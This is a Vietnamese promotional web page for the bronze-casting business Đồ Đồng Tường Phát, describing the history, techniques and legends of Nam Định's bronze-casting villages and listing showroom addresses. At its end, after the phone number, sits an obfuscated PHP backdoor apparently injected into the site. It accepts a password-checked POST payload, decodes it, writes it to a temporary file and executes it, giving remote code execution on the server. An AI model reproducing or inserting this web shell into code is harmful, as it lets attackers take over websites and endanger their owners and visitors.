Xưởng đúc đồng tường phát địa chỉ Nam tiến nam trực nam định

Làng nghề đúc đồng ở Việt Nam, đặc biệt tại Nam Định, đã trở thành một biểu tượng nổi tiếng không chỉ là nguồn sống của cộng đồng mà còn là niềm đam mê mãnh liệt với nghề của tổ tiên, được truyền lại từ thế hệ này sang thế hệ khác. Trong bài viết này, chúng ta sẽ khám phá một trong những làng nghề đúc đồng nổi tiếng ở Nam Định – làng Đồng Quỹ, hay còn được biết đến với tên gọi Đỉnh Đồng Tường Phát. >> xem tiếp Trọn bộ Đỉnh Đồng tại Đồ Đồng Tường Phát

Xưởng Đúc Đồng Tường Phát 

Đồng Quỹ và Nam Tiến, hai làng nghề đúc đồng nổi tiếng tại Nam Định, đưa chúng ta quay về thời gian hàng trăm năm trước qua những câu chuyện của những người cao tuổi ở Đồng Quỹ. Thôn làng này đã phát triển mạnh mẽ với hàng chục lò đúc hoạt động liên tục, tạo ra các sản phẩm đa dạng từ mâm, niêu, nồi, tượng, chuông đến nhạc cụ như thanh la, não bạt, cồng, chiêng. Những tác phẩm tài hoa của thợ đúc và thợ khảm ở Đồng Quỹ không chỉ là biểu tượng của nghệ thuật dân dụ của Việt Nam mà còn được phân phối rộng rãi cả trong và ngoài biên giới.

Quá trình đúc đồng ngày xưa là một công việc đòi hỏi sự khéo léo và làm thủ công. Từ việc tạo mẫu cốt từ đất sét hoặc gỗ đến việc chọn loại đất sét phù hợp để làm khuôn, mọi bước đều phải được thực hiện bằng tay. Tuy nhiên, ngày nay, nhờ vào sự tiến bộ và đa dạng về vật liệu, quá trình sản xuất trở nên thuận tiện hơn nhiều.

Sau khi chọn loại đất sét phù hợp, thợ đúc tiếp tục các bước như phơi khô, nghiền nhỏ và ngâm trong nước trộn với bột giấy và xi măng. Hỗn hợp này sau đó được nghiền nhuyễn và trộn vào mẫu cốt để tạo khuôn hai nửa. Khuôn được đặt vào lò nung, nung ở nhiệt độ cao, để nguội và chỉnh sửa bề mặt để có độ nhẵn và đẹp. Cuối cùng, các khuôn được ghép lại để tạo thành sản phẩm hoàn chỉnh.

đồng tường phát

Những người thợ đúc có kinh nghiệm và đam mê sẽ tỉ mỉ lựa chọn loại đồng như vàng, đỏ, tam thất để tạo ra các sản phẩm độc đáo và tinh xảo. Làng nghề Tống Xá ở huyện Ý Yên, cách trung tâm thành phố Nam Định 20 km, tồn tại gần 900 năm và vẫn giữ vững truyền thống của cha ông, lan tỏa rộng khắp.

Nghề đúc đồng tại Tống Xá không chỉ là một nghề mưu sinh mà còn là một câu chuyện cổ tích đầy màu sắc. Xuất phát từ Nguyễn Chí Thành, người theo đạo Thiền và trở thành hầu của Thiền sư Giác Không Ông, nghề đúc đồng đã được ông dạy dỗ và truyền lại. Dân làng xây dựng đền thờ để tưởng nhớ công lao của ông và tổ chức hội vào tháng 2 âm lịch hàng năm để tưởng niệm và cảm ơn người đã truyền nghề, góp phần cho sự phát triển của làng.

Nam Định không chỉ là nơi giữ vững làng nghề đúc đồng thủ công từ cha ông để lại, mà còn là nơi nghề đúc đồng trở thành một nghệ thuật cao quý và linh thiêng. Mỗi năm, những sản phẩm tinh xảo từ đồng được tạo ra bởi bàn tay khéo léo của những người thợ đúc không chỉ truyền thần cho mỗi gia đình Việt mà còn là biểu tượng của sức sống và tinh thần văn hóa đặc trưng của dân tộc.

Làng nghề đúc đồng tại Nam Định

 Làng nghề đúc đồng tại Nam Định không chỉ là nơi quy tụ những người thợ lành nghề, mà còn là biểu tượng của sự kết nối giữa quá khứ và hiện tại, giữa truyền thống và hiện đại. Mỗi năm, những sản phẩm đỉnh đồng đỏ và tinh xảo từ bàn tay khéo léo của những người thợ đúc tại những làng nghề nổi tiếng như Đồng Quỹ, Nam Tiến và Tống Xá không chỉ làm giàu thêm văn hóa dân dụ mà còn là nguồn cảm hứng cho các nghệ nhân và nghệ sĩ đương đại.
 

Làng Đồng Quỹ nổi tiếng với đỉnh đồng Tường Phát, đã và đang là địa điểm thu hút đông đảo du khách và người yêu nghệ thuật. Không chỉ là nơi sản xuất đồng mỹ nghệ, Đồng Quỹ còn là không gian lưu giữ những câu chuyện cổ tích, những giá trị văn hóa truyền thống. Các sản phẩm tinh tế như mâm, niêu, nồi, tượng, chuông và nhạc cụ như thanh la, não bạt, cồng, chiêng đều được tạo ra không chỉ với sự tâm huyết của người thợ mà còn là sự kế thừa và phát triển của một cộng đồng.

Liên hệ và tư vấn:

Showroom Tại Hà Nội

Tòa nhà Hồ Gươm Plaza, Số 102 Trần Phú, Hà Đông, Hà Nội

Sao biển 23, Vinhome Ocean park, Gia Lâm, Hà Nội

Showroom Nam Định:

Shophouse 36-Khu Đô Thị Dệt May-Trần Phú-Tp Nam Định

Xem thêm các sản phẩm của Đồ Đồng Tường Phát

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

0986.8484.65
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}